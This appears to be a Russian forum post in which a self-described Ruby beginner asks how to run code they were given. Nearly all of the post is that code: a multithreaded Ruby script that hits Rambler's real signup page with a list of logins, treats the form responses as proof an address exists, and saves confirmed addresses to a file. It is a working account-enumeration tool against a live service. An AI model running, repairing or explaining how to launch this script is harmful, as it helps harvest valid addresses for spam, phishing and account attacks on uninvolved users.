Вобщем дали мне код а как запустить незнаю,про руби узнал тока сегодня помогите плз. Code: #!/usr/bin/ruby require 'net/http' #require 'net/https' if ARGV.size<4 or ARGV.size>6 puts "Not enought arguments\n<logfile> <maillistfile> <outfile> <count> [<threads count> <begin no>]" puts "default threads count is equal 50" exit end $logfile=ARGV[0] $maillistfile=ARGV[1] $outputfile=ARGV[2] $count=ARGV[3].to_i if ARGV.size>=5 then $max_th_count = ARGV[4].to_i else $max_th_count=50 end if ARGV.size==6 then $beg_no=ARGV[5].to_i else $beg_no=0 end begin $logf=File.open($logfile,"a") rescue puts "Can't create logfile #{$logfile}" exit end def exist_mail(login) begin http = Net::HTTP.new('id.rambler.ru', 80) rescue => e $logf.puts "#{Time.now}: Socket error: #{e}" end path = '/script/newuser.cgi' # GET request -> so the host can set his cookies begin resp, data = http.get(path, nil) rescue => e $logf.puts "#{Time.now}: Can't get page: #{e}" end cookie = resp.response['set-cookie'] # POST request -> logging in data = "back=&step=one&login=#{login}&firstname=fuck&lastname=fuck" headers = { 'Cookie' => cookie, 'Referer' => 'http://id.rambler.ru/script/newuser.cgi', 'Content-Type' => 'application/x-www-form-urlencoded' } begin resp, data = http.post(path, data, headers) rescue => e $logf.puts "#{Time.now}: Can't send form: #{e}" end return (!(data.include?("captcha")) and data.include?("<input type=\"text\" name=\"firstname\"")) end#def begin $mlf=File.open($maillistfile,"r") rescue => e puts "#{Time.now}: Can't read #{$maillistfile}: #{e}" $logf.puts "#{Time.now}: Can't read #{$maillistfile}: #{e}" exit end $th_cnt=0 kk=0 while kk<$beg_no do $mlf.gets kk+=1 end $num=0 while $num<$count do while $th_cnt>=$max_th_count do sleep(3) end $th_cnt+=1 sleep(0.1) th=Thread.new do str=$mlf.gets $num+=1 if str!=nil if exist_mail(str.chop!) puts "#{$num}) #{Time.now} #{str}@rambler.ru ========== EXIST ===========" File.open($outputfile,"a"){|sfile| sfile.puts "#{str}@rambler.ru"} else puts "#{$num}) #{Time.now} #{str}@rambler.ru FAIL" end end $th_cnt-=1 end end $mlf.close $logf.close